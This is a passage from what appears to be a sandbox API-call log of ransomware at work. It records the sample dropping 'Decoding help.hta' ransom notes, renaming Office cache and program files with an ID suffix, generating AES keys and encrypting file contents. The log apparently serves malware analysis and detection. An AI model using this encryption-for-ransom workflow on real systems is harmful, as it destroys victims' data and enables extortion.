nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x36cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x36cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.869] CloseHandle (hObject=0x4b0) returned 1 [0048.129] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0048.134] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0049.193] lstrcpyW (in: lpString1=0x10d5eb58, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0049.193] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0049.193] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0049.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0049.194] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PowerPointMUI.xml") returned -1 [0049.194] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0049.194] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0049.194] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0049.194] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="PowerPointMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0049.194] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0049.194] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0049.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.646] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0053.646] CreateFileMappingA (hFile=0x498, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x438 [0053.647] CryptAcquireContextA (in: phProv=0x36cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x36cfcec*=0x3449e80) returned 1 [0055.074] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x36cfce8 | out: phKey=0x36cfce8*=0x6710f0) returned 1 [0055.074] CryptExportKey (in: hKey=0x6710f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x36cfbe4, pdwDataLen=0x36cfce4 | out: pbData=0x36cfbe4*, pdwDataLen=0x36cfce4*=0x2c) returned 1 [0055.074] MapViewOfFile (hFileMappingObject=0x438, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x2d0000 [0055.083] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36cfbe4*, pdwDataLen=0x36cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x36cfbe4*, pdwDataLen=0x36cfcf8*=0x100) returned 1 [0055.083] CryptEncrypt (in: hKey=0x6710f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x36cfce4*=0x5a0, dwBufLen=0x5a0 | out: pbData=0x2d0000*, pdwDataLen=0x36cfce4*=0x5a0) returned 1 [0055.083] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0055.085] CloseHandle (hObject=0x438) returned 1 [0055.085] CryptDestroyKey (hKey=0x6710f0) returned 1 [0055.085] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0055.085] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.085] WriteFile (in: hFile=0x498, lpBuffer=0x36cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x36cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x36cfbe4*, lpNumberOfBytesWritten=0x36cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.952] WriteFile (in: hFile=0x498, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x36cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x36cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.952] CloseHandle (hObject=0x498) returned 1 [0056.953] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.516] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x36cfd30 | out: lpFindFileData=0x36cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0058.516] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0058.516] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.516] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.516] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PptLR.cab") returned -1 [0058.516] lstrlenW (lpString="PptLR.cab") returned 9 [0058.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0058.516] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.516] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="PptLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0058.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0058.516] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.517] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x498 [0058.517] CreateFileMappingA (hFile=0x498, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x71c [0058.517] CryptAcquireContextA (in: phProv=0x36cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x36cfcec*=0x2aac6d48) returned 1 [0060.229] CryptGenKey (in: hProv=0x2aac6d48, Algid=0x6610, dwFlags=0x1, phKey=0x36cfce8 | out: phKey=0x36cfce8*=0x5d7d10) returned 1 [0060.229] CryptExportKey (in: hKey=0x5d7d10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x36cfbe4, pdwDataLen=0x36cfce4 | out: pbData=0x36cfbe4*, pdwDataLen=0x36cfce4*=0x2c) returned 1 [0060.229] MapViewOfFile (hFileMappingObject=0x71c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x9050000 Thread: id = 113 os_tid = 0xbfc [0040.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*", lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5cb0 [0041.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.443] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.443] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.443] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0041.443] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*" [0041.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*") returned 46 [0041.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\Decoding help.hta" [0041.444] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\Decoding help.hta" (normalized: "c:\\program files\\common files\\services\\decoding help.hta")) returned 0xffffffff [0041.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\Decoding help.hta" (normalized: "c:\\program files\\common files\\services\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x290 [0041.444] WriteFile (in: hFile=0x290, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3f8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.445] CloseHandle (hObject=0x290) returned 1 [0041.445] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.445] lstrcmpiW (lpString1="Decoding help.hta", lpString2="verisign.bmp") returned -1 [0041.445] lstrlenW (lpString="verisign.bmp") returned 12 [0041.445] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*" [0041.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Services\\*.*") returned 46 [0041.445] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\", lpString2="verisign.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" [0041.445] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" [0041.445] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0041.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 1 [0041.628] FindNextFileW (in: hFindFile=0x5a5cb0, lpFindFileData=0x3f8fd30 | out: lpFindFileData=0x3f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0041.628] FindClose (in: hFindFile=0x5a5cb0 | out: hFindFile=0x5a5cb0) returned 1 Thread: id = 114 os_tid = 0x5c8 [0040.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xac8fd30 | out: lpFindFileData=0xac8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8390 [0041.755] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.756] FindNextFileW (in: hFindFile=0x5d8390, lpFindFileData=0xac8fd30 | out: lpFindFileData=0xac8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.756] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.756] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.756] FindNextFileW (in: hFindFile=0x5d8390, lpFindFileData=0xac8fd30 | out: lpFindFileData=0xac8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0041.756] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" [0041.756] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.756] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.756] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0042.002] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xac8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xac8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.003] CloseHandle (hObject=0x4bc) returned 1 [0042.004] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.004] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PublisherMUI.msi") returned -1 [0042.004] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0042.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" [0042.004] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0042.004] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="PublisherMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" [0042.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" [0042.004] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0042.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.143] CreateFileW 